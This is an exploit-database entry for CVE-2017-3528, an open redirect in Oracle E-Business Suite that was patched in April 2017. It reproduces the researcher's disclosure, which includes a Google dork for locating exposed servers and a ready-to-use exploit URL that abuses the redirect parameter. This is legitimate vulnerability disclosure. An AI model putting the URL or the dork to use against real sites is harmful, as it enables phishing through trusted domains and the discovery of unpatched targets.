Lucene search

K
exploitpackAndrew GillEXPLOITPACK:3910B3FDDB0AB5130FF0A186BC43CAAD
HistoryJan 15, 2018 - 12:00 a.m.

Oracle E-Business Suite 12.1.312.2.x - Open Redirect

2018-01-1500:00:00
Andrew Gill
21

EPSS

0.009

Percentile

82.4%

Oracle E-Business Suite 12.1.312.2.x - Open Redirect

# Exploit Title: Oracle E-Business suite Open Redirect
# Google Dork: inurl:OA_HTML/cabo/
# Date: April 2017
# Exploit Author: [author]
# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
# Software Link: [download link if available]
# Version: Oracle E-Business Suite  (REQUIRED)
# Tested on: [relevant os]
# CVE :  CVE-2017-3528

The exploit can be leveraged for an open redirect using the following
exploit path:

https://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com

Oracle E-Business suite is vulnerable to an open redirect issue,
specifically the redirect parameter allows any domain to be supplied
and it will be rendered on the target's site.

Note I was also credited for this CVE, see the Oracle
CPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)

EPSS

0.009

Percentile

82.4%

Related for EXPLOITPACK:3910B3FDDB0AB5130FF0A186BC43CAAD